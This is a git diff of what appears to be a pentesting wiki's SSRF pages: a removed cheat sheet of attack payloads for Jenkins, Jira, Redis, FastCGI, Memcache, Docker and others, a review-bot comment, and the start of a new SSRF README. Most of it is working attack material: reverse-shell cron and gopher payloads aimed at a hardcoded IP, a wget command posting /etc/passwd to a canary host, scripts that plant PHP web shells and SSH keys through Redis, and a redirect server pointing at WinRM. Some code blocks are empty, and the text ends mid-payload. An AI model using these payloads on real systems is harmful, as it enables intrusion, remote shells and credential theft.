-Append this to the end of every internal endpoint/URL you know of:
-
-```http
-?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SSRF_CANARY/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
-```
-
-## JBoss
-
-**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
-
-Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
-
-**SSRF Canary: Deploy WAR from URL**
-
-```bash
-/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://SSRF_CANARY/utils/cmd.war
-```
-
-## Confluence
-
-**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
-
-**SSRF Canary: Sharelinks (Confluence versions released from 2016 November and older)**
-
-```bash
-/rest/sharelinks/1.0/link?url=https://SSRF_CANARY/
-```
-
-**SSRF Canary: iconUriServlet - Confluence < 6.1.3 (CVE-2017-9506)**
-
-[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344)
-
-```bash
-/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
-```
-
-## Jira
-
-**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
-
-**SSRF Canary: iconUriServlet - Jira < 7.3.5 (CVE-2017-9506)**
-
-[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344)
-
-```bash
-/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
-```
-
-**SSRF Canary: makeRequest - Jira < 8.4.0 (CVE-2019-8451)**
-
-[Atlassian Security Ticket JRASERVER-69793](https://jira.atlassian.com/browse/JRASERVER-69793)
-
-```bash
-/plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com
-```
-
-## Other Atlassian Products
-
-**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
-
-**SSRF Canary: iconUriServlet (CVE-2017-9506)**:
-
-* Bamboo < 6.0.0
-* Bitbucket < 4.14.4
-* Crowd < 2.11.2
-* Crucible < 4.3.2
-* Fisheye < 4.3.2
-
-[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344)
-
-```bash
-/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
-```
-
-## OpenTSDB
-
-**Commonly bound port: 4242**
-
-[OpenTSDB Remote Code Execution](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html)
-
-**SSRF Canary: curl via RCE**
-
-```bash
-/q?start=2016/04/13-10:21:00&ignore=2&m=sum:jmxdata.cpu&o=&yrange=[0:]&key=out%20right%20top&wxh=1900x770%60curl%20SSRF_CANARY%60&style=linespoint&png
-```
-
-[OpenTSDB 2.4.0 Remote Code Execution](https://github.com/OpenTSDB/opentsdb/issues/2051)
-
-**SSRF Canary: curl via RCE - CVE-2020-35476**
-
-```bash
-/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('wget%20--post-file%20/etc/passwd%20SSRF_CANARY')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
-```
-
-## Jenkins
-
-**Commonly bound ports: 80,443 (SSL),8080,8888**
-
-Great writeup [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html).
-
-**SSRF Canary: CVE-2018-1000600**
-
-```bash
-/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://SSRF_CANARY/%23&login=orange&password=tsai
-```
-
-**RCE**
-
-Follow the instructions here to achieve RCE via GET: [Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html)
-
-```bash
-/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='orange.tw', root='http://SSRF_CANARY/')%0a@Grab(group='tw.orange', module='poc', version='1')%0aimport Orange;
-```
-
-**RCE via Groovy**
-
-```
-cmd = 'curl burp_collab'
-pay = 'public class x {public x(){"%s".execute()}}' % cmd
-data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=' + urllib.quote(pay)
-```
-
-## Hystrix Dashboard
-
-**Commonly bound ports: 80,443 (SSL),8080**
-
-Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6.
-
-**SSRF Canary: CVE-2020-5412**
-
-```bash
-/proxy.stream?origin=http://SSRF_CANARY/
-```
-
-## W3 Total Cache
-
-**Commonly bound ports: 80,443 (SSL)**
-
-W3 Total Cache 0.9.2.6-0.9.3
-
-**SSRF Canary: CVE-2019-6715**
-
-This needs to be a PUT request:
-
-```bash
-PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
-Host: {{Hostname}}
-Accept: */*
-User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
-Content-Length: 124
-Content-Type: application/x-www-form-urlencoded
-Connection: close
-
-{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://SSRF_CANARY"}
-```
-
-**SSRF Canary**
-
-The advisory for this vulnerability was released here: [W3 Total Cache SSRF vulnerability](https://klikki.fi/adv/w3\_total\_cache.html)
-
-This PHP code will generate a payload for your SSRF Canary host (replace `url` with your canary host):
-
-```php
-
-```
-
-## Docker
-
-**Commonly bound ports: 2375, 2376 (SSL)**
-
-If you have a partially blind SSRF, you can use the following paths to verify the presence of Docker's API:
-
-```bash
-/containers/json
-/secrets
-/services
-```
-
-**RCE via running an arbitrary docker image**
-
-```http
-POST /containers/create?name=test HTTP/1.1
-Host: website.com
-Content-Type: application/json
-...
-
-{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}
-```
-
-Replace alpine with an arbitrary image you would like the docker container to run.
-
-## Gitlab Prometheus Redis Exporter
-
-**Commonly bound ports: 9121**
-
-This vulnerability affects Gitlab instances before version 13.1.1. According to the [Gitlab documentation](https://docs.gitlab.com/ee/administration/monitoring/prometheus/#configuring-prometheus) `Prometheus and its exporters are on by default, starting with GitLab 9.0.`
-
-These exporters provide an excellent method for an attacker to pivot and attack other services using CVE-2020-13379. One of the exporters which is easily exploited is the Redis Exporter.
-
-The following endpoint will allow an attacker to dump all the keys in the redis server provided via the target parameter:
-
-```bash
-http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=*
-```
-
-***
-
-**Possible via Gopher**
-
-## Redis
-
-**Commonly bound port: 6379**
-
-Recommended reading:
-
-* [Trying to hack Redis via HTTP requests](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html)
-* [SSRF Exploits against Redis](https://maxchadwick.xyz/blog/ssrf-exploits-against-redis)
-
-**RCE via Cron** - [Gopher Attack Surfaces](https://blog.chaitin.cn/gopher-attack-surfaces/)
-
-```bash
-redis-cli -h $1 flushall
-echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1\n\n"|redis-cli -h $1 -x set 1
-redis-cli -h $1 config set dir /var/spool/cron/
-redis-cli -h $1 config set dbfilename root
-redis-cli -h $1 save
-```
-
-Gopher:
-
-```bash
-gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
-```
-
-**RCE via Shell Upload (PHP)** - [Redis Getshell Summary](https://www.mdeditor.tw/pl/pBy0)
-
-```python
-#!/usr/bin/env python
-# -*-coding:utf-8-*-
-
-import urllib
-protocol="gopher://"
-ip="192.168.189.208"
-port="6379"
-shell="\n\n\n\n"
-filename="shell.php"
-path="/var"
-passwd=""
-
-cmd=["flushall",
- "set 1 {}".format(shell.replace(" ","${IFS}")),
- "config set dir {}".format(path),
- "config set dbfilename {}".format(filename),
- "save"
- ]
-if passwd:
- cmd.insert(0,"AUTH {}".format(passwd))
-payload=protocol+ip+":"+port+"/_"
-def redis_format(arr):
- CRLF="\r\n"
- redis_arr = arr.split(" ")
- cmd=""
- cmd+="*"+str(len(redis_arr))
- for x in redis_arr:
- cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
- cmd+=CRLF
- return cmd
-
-if __name__=="__main__":
- for x in cmd:
- payload += urllib.quote(redis_format(x))
- print payload
-```
-
-**RCE via authorized\_keys** - [Redis Getshell Summary](https://www.mdeditor.tw/pl/pBy0)
-
-```python
-import urllib
-protocol="gopher://"
-ip="192.168.189.208"
-port="6379"
-# shell="\n\n\n\n"
-sshpublic_key = "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8IOnJUAt5b/5jDwBDYJTDULjzaqBe2KW3KhqlaY58XveKQRBLrG3ZV0ffPnIW5SLdueunb4HoFKDQ/KPXFzyvVjqByj5688THkq1RJkYxGlgFNgMoPN151zpZ+eCBdFZEf/m8yIb3/7Cp+31s6Q/DvIFif6IjmVRfWXhnkjNehYjsp4gIEBiiW/jWId5yrO9+AwAX4xSabbxuUyu02AQz8wp+h8DZS9itA9m7FyJw8gCrKLEnM7PK/ClEBevDPSR+0YvvYtnUxeCosqp9VrjTfo5q0nNg9JAvPMs+EA1ohUct9UyXbTehr1Bdv4IXx9+7Vhf4/qwle8HKali3feIZ root@kali\n\n"
-filename="authorized_keys"
-path="/root/.ssh/"
-passwd=""
-cmd=["flushall",
- "set 1 {}".format(sshpublic_key.replace(" ","${IFS}")),
- "config set dir {}".format(path),
- "config set dbfilename {}".format(filename),
- "save"
- ]
-if passwd:
- cmd.insert(0,"AUTH {}".format(passwd))
-payload=protocol+ip+":"+port+"/_"
-def redis_format(arr):
- CRLF="\r\n"
- redis_arr = arr.split(" ")
- cmd=""
- cmd+="*"+str(len(redis_arr))
- for x in redis_arr:
- cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
- cmd+=CRLF
- return cmd
-
-if __name__=="__main__":
- for x in cmd:
- payload += urllib.quote(redis_format(x))
- print payload
-```
-
-**RCE on GitLab via Git protocol**
-
-Great writeup from Liveoverflow [here](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/).
-
-While this required authenticated access to GitLab to exploit, I am including the payload here as the `git` protocol may work on the target you are hacking. This payload is for reference.
-
-```bash
-git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
-```
-
-## Memcache
-
-**Commonly bound port: 11211**
-
-* [vBulletin Memcache RCE](https://www.exploit-db.com/exploits/37815)
-* [GitHub Enterprise Memcache RCE](https://www.exploit-db.com/exploits/42392)
-* [Example Gopher payload for Memcache](https://blog.safebuff.com/2016/07/03/SSRF-Tips/#SSRF-memcache-Getshell)
-
-```bash
-gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a
-gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a
-```
-
-## Apache Tomcat
-
-**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
-
-Effective against Tomcat 6 only:
-
-[gopher-tomcat-deployer](https://github.com/pimps/gopher-tomcat-deployer)
-
-CTF writeup using this technique:
-
-[From XXE to RCE: Pwn2Win CTF 2018 Writeup](https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/)
-
-## FastCGI
-
-**Commonly bound ports: 80,443 (SSL)**
-
-This was taken from [here](https://blog.chaitin.cn/gopher-attack-surfaces/).
-
-```bash
-gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/172.19.23.228/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00
-```
-
-## Java RMI
-
-**Commonly bound ports: 1090,1098,1099,1199,4443-4446,8999-9010,9999**
-
-Blind _SSRF_ vulnerabilities that allow arbitrary bytes (_gopher based_) can be used to perform deserialization or codebase attacks on the _Java RMI_ default components (_RMI Registry_, _Distributed Garbage Collector_, _Activation System_). A detailed writeup can be found [here](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/). The following listing shows an example for the payload generation:
-
-```
-$ rmg serial 127.0.0.1 1090 CommonsCollections6 'curl example.burpcollaborator.net' --component reg --ssrf --gopher
-[+] Creating ysoserial payload... done.
-[+]
-[+] Attempting deserialization attack on RMI Registry endpoint...
-[+]
-[+] SSRF Payload: gopher://127.0.0.1:1090/_%4a%52%4d%49%00%02%4c%50%ac%ed%00%05%77%22%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%02%44%15%4d[...]
-```
-
-***
-
-**Tools**
-
-## Gopherus
-
-* [Gopherus - Github](https://github.com/tarunkant/Gopherus)
-* [Blog post on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
-
-This tool generates Gopher payloads for:
-
-* MySQL
-* PostgreSQL
-* FastCGI
-* Redis
-* Zabbix
-* Memcache
-
-## remote-method-guesser
-
-* [remote-method-guesser - Github](https://github.com/qtc-de/remote-method-guesser)
-* [Blog post on SSRF usage](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/)
-
-_remote-method-guesser_ is a _Java RMI_ vulnerability scanner that supports attack operations for most common _Java RMI_ vulnerabilities. Most of the available operations support the `--ssrf` option, to generate an _SSRF_ payload for the requested operation. Together with the `--gopher` option, ready to use _gopher_ payloads can be generated directly.
-
-## SSRF Proxy
-
-* [SSRF Proxy](https://github.com/bcoles/ssrf\_proxy)
-
-SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
-
-## References
-
-* [https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4](https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4)
-* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)
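Review bot: several of the code blocks removed in this hunk were already gutted in the old file, so whichever page receives this content should restore them from the cited sources rather than carry the empty fences across. The PeopleSoft "SSRF Canary: XXE #1" block after `POST /PSIGW/HttpListeningConnector HTTP/1.1` has lost every XML element (only `]>`, `&x;` and `your_message_content]]>` survive), "XXE #2" is an empty body after `Content-Type: application/xml`, and the W3 Total Cache section says "This PHP code will generate a payload for your SSRF Canary host" above an empty ```php fence; the Gopher and Struts payloads are intact, so this is extraction loss of `<...>` tags, not intent. Two smaller things to fix in the moved copy: the ssrf-sheriff line lists `(GET, POST, PTU, DELETE, ...)` where `PUT` is meant, and the stray `**Possible via Gopher**` line between the `***` rule and the `## Redis` heading reads as an orphaned section label. Finally, in the visible part of this diff the "Detect SSRF", "To practice", "Vulnerable Platforms" (Elasticsearch through Java RMI), "Tools" and "References" sections have no counterpart in the new README.md hunk below; if they are being split out to their own page, that page is not part of what is shown here, so confirm it lands in the same change so the move does not silently drop the assetnote-derived platform list and the remote-method-guesser / SSRF Proxy tool notes.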
diff --git a/pentesting-web/ssrf-server-side-request-forgery/README.md b/pentesting-web/ssrf-server-side-request-forgery/README.md
new file mode 100644
index 000000000..5bd027155
--- /dev/null
+++ b/pentesting-web/ssrf-server-side-request-forgery/README.md
@@ -0,0 +1,261 @@
+# SSRF (Server Side Request Forgery)
+
+## What is Server Side Request Forgery?
+
+Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to **induce the server-side application to make HTTP requests to an arbitrary domain** of the attacker's choosing. (From [here](https://portswigger.net/web-security/ssrf))
+
+## Capture SSRF
+
+The first thing you need to do is to capture a SSRF interaction provoked by you. To capture a HTTP or DNS interaction you can use tools such as:
+
+* **Burpcollab**
+* [**pingb**](http://pingb.in)
+* ****[**canarytokens**](https://canarytokens.org/generate#)****
+* ****[**interractsh**](https://github.com/projectdiscovery/interactsh)****
+* ****[**http://webhook.site**](http://webhook.site)****
+* [**https://github.com/teknogeek/ssrf-sheriff**](https://github.com/teknogeek/ssrf-sheriff)****
+
+## Whitelisted Domains Bypass
+
+Usually you will find that the SSRF is only working in **certain whitelisted domains** or URL. In the following page you have a **compilation of techniques to try to bypass that whitelist**:
+
+{% content-ref url="url-format-bypass.md" %}
+[url-format-bypass.md](url-format-bypass.md)
+{% endcontent-ref %}
+
+### Bypass via open redirect
+
+If the server is correctly protected you could **bypass all the restrictions by exploiting an Open Redirect inside the web page**. Because the webpage will allow **SSRF to the same domain** and probably will **follow redirects**, you can exploit the **Open Redirect to make the server to access internal any resource**.\
+Read more here: [https://portswigger.net/web-security/ssrf](https://portswigger.net/web-security/ssrf)
+
+## SSRF via Referrer header
+
+Some applications employ server-side analytics software that tracks visitors. This software often logs the Referrer header in requests, since this is of particular interest for tracking incoming links. Often the analytics software will actually visit any third-party URL that appears in the Referrer header. This is typically done to analyze the contents of referring sites, including the anchor text that is used in the incoming links. As a result, the Referer header often represents fruitful attack surface for SSRF vulnerabilities.\
+To discover this kind of "hidden" vulnerabilities you could use the plugin "**Collaborator Everywhere**" from Burp.
+
+## Exploitation
+
+### [Wget file upload](../file-upload/#wget-file-upload-ssrf-trick)
+
+### file://
+
+```
+file:///etc/passwd
+```
+
+### dict://
+
+The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
+
+```
+dict://;@:/d:::
+ssrf.php?url=dict://attacker:11111/
+```
+
+### SFTP://
+
+A network protocol used for secure file transfer over secure shell
+
+```
+ssrf.php?url=sftp://evil.com:11111/
+```
+
+### TFTP://
+
+Trivial File Transfer Protocol, works over UDP
+
+```
+ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
+```
+
+### LDAP://
+
+Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.
+
+```
+ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
+```
+
+### Gopher://
+
+Using this protocol you can specify the **IP, port and bytes** you want the server to **send**. Then, you can basically exploit a SSRF to **communicate with any TCP server** (but you need to know how to talk to the service first).\
+Fortunately, you can use [Gopherus](https://github.com/tarunkant/Gopherus) to create payloads for several services. Additionally, [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) can be used to create _gopher_ payloads for _Java RMI_ services.
+
+#### Gopher smtp
+
+```
+ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
+will make a request like
+HELO localhost
+MAIL FROM:
+RCPT TO:
+DATA
+From: [Hacker]
+To:
+Date: Tue, 15 Sep 2017 17:20:26 -0400
+Subject: Ah Ah AHYou didn't say the magic word !
+.
+QUIT
+```
+
+#### Gopher HTTP
+
+```bash
+#For new lines you can use %0A, %0D%0A
+gopher://:8080/_GET / HTTP/1.0%0A%0A
+gopher://:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
+```
+
+#### Gopher SMTP — Back connect to 1337
+
+{% code title="redirect.php" %}
+```php
+Now query it.
+https://example.com/?q=http://evil.com/redirect.php.
+```
+{% endcode %}
+
+### SMTP
+
+From [https://twitter.com/har1sec/status/1182255952055164929](https://twitter.com/har1sec/status/1182255952055164929):\
+1\. connect with SSRF on smtp localhost:25\
+2\. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail\
+3\. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains\
+4\. connect
+
+### SSRF with Command Injection
+
+It might be worth trying a payload like: `` url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami` ``
+
+### Exploiting PDFs Rendering
+
+If the web page is automatically creating a PDF with some information you have provided, you can **insert some JS that will be executed by the PDF creator** itself (the server) while creating the PDF and you will be able to abuse a SSRF. [**Find more information here**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**.**
+
+### From SSRF to DoS
+
+Create several sessions and try to download heavy files exploiting the SSRF from the sessions.
+
+### SSRF Redirect to Gopher
+
+For some exploitations you might need to **send a redirect response** (potentially to use a different protocol like gopher). Here you have different python codes to respond with a redirect:
+
+```python
+# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
+from http.server import HTTPServer, BaseHTTPRequestHandler
+import ssl
+
+class MainHandler(BaseHTTPRequestHandler):
+ def do_GET(self):
+ print("GET")
+ self.send_response(301)
+ self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%2
0%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a